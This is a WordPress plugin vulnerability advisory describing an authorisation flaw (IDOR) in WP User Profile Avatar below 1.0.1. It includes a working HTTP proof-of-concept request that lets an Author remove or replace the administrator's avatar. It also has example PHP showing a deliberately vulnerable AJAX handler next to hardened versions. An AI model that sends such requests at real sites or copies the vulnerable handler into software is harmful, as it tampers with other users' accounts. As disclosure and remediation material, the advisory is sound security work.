WordPress Plugin Vulnerabilities
WP User Profile Avatar < 1.0.1 - Author+ Avatar Deletion/Update via IDOR
Description
The plugin does not properly check for authorisation in its avatar AJAX handlers, allowing users with the Author role (or higher) to delete and update the avatar of arbitrary users by supplying another account's user ID.
Proof of Concept
POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849
Content-Length: 472
Origin: http://your_site
DNT: 1
Connection: close
Referer: http://your_site/wordpress/?p=873
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="action"

remove_user_avatar
# here you can use update_user_avatar instead and change the avatar of a user by id from an Author account
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="form_data"

wpupa_url=&wpupa_attachment_id=875&user_id=1
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="security"

3f855e1991
-----------------------------49182745140183315063494246849--
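The request above carries a valid `security` nonce, so the handler's nonce check passes; what is missing is a check that the caller is allowed to act on the `user_id` it submits. The following is an added illustration, not the plugin's own code: a WordPress admin-ajax handler for avatar removal and update written first in the vulnerable shape the description implies, then with the authorisation check a fixed version would need. The hook names match the `action` values in the PoC; the nonce action name (`wpupa_nonce`) and the user meta key (`wpupa_attachment_id`) are assumptions for the example.

```php
<?php
/**
 * Added example (not the plugin's code). Reads the same multipart fields the
 * PoC sends: action, form_data (URL-encoded string) and security (nonce).
 * Assumed names: nonce action 'wpupa_nonce', user meta key 'wpupa_attachment_id'.
 */

// Parse the URL-encoded "form_data" field into an array, as the PoC shows it.
function wpupa_example_parse_form_data() {
    $form = array();
    wp_parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $form );
    return array(
        'user_id'       => absint( $form['user_id'] ?? 0 ),
        'attachment_id' => absint( $form['wpupa_attachment_id'] ?? 0 ),
    );
}

// Vulnerable shape: the nonce only proves the request came from a logged-in
// user's page; nothing ties the submitted user_id to the caller, so an
// Author can pass user_id=1 and remove the administrator's avatar.
function wpupa_example_remove_avatar_vulnerable() {
    check_ajax_referer( 'wpupa_nonce', 'security' );
    $data = wpupa_example_parse_form_data();
    delete_user_meta( $data['user_id'], 'wpupa_attachment_id' );
    wp_send_json_success();
}

// Authorisation helper used by the hardened handlers: the caller must be
// acting on their own account or hold edit_user for the target user
// (administrators do; authors do not).
function wpupa_example_caller_may_edit_user( $user_id ) {
    if ( 0 === $user_id ) {
        return false;
    }
    return get_current_user_id() === $user_id
        || current_user_can( 'edit_user', $user_id );
}

// Hardened removal: same request format, with the missing check added.
function wpupa_example_remove_avatar_hardened() {
    check_ajax_referer( 'wpupa_nonce', 'security' );
    $data = wpupa_example_parse_form_data();

    if ( ! wpupa_example_caller_may_edit_user( $data['user_id'] ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    delete_user_meta( $data['user_id'], 'wpupa_attachment_id' );
    wp_send_json_success();
}

// Hardened update: besides the user check, the attachment being assigned must
// be an image the caller is allowed to use (edit_post on the attachment).
function wpupa_example_update_avatar_hardened() {
    check_ajax_referer( 'wpupa_nonce', 'security' );
    $data = wpupa_example_parse_form_data();

    if ( ! wpupa_example_caller_may_edit_user( $data['user_id'] ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( ! wp_attachment_is_image( $data['attachment_id'] )
        || ! current_user_can( 'edit_post', $data['attachment_id'] ) ) {
        wp_send_json_error( 'invalid attachment', 400 );
    }

    update_user_meta( $data['user_id'], 'wpupa_attachment_id', $data['attachment_id'] );
    wp_send_json_success();
}

// Register the hardened handlers for the action names seen in the PoC.
add_action( 'wp_ajax_remove_user_avatar', 'wpupa_example_remove_avatar_hardened' );
add_action( 'wp_ajax_update_user_avatar', 'wpupa_example_update_avatar_hardened' );
```

The design point is that `check_ajax_referer()` is a CSRF control, not an access control: every logged-in user can obtain a valid nonce, so a handler that accepts a caller-supplied `user_id` needs a separate ownership or capability check before touching another account's data.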
Affects Plugins
References
Classification
Type: IDOR
OWASP top 10:
CWE:
Miscellaneous
Original Researcher: Dmitrii Ignatyev
Submitter: Dmitrii Ignatyev
Submitter website:
Verified: Yes
WPVDB ID:
Timeline
Publicly Published: 2023-12-29 (about 4 months ago)
Added: 2023-12-29 (about 4 months ago)
Last Updated: 2024-01-10 (about 4 months ago)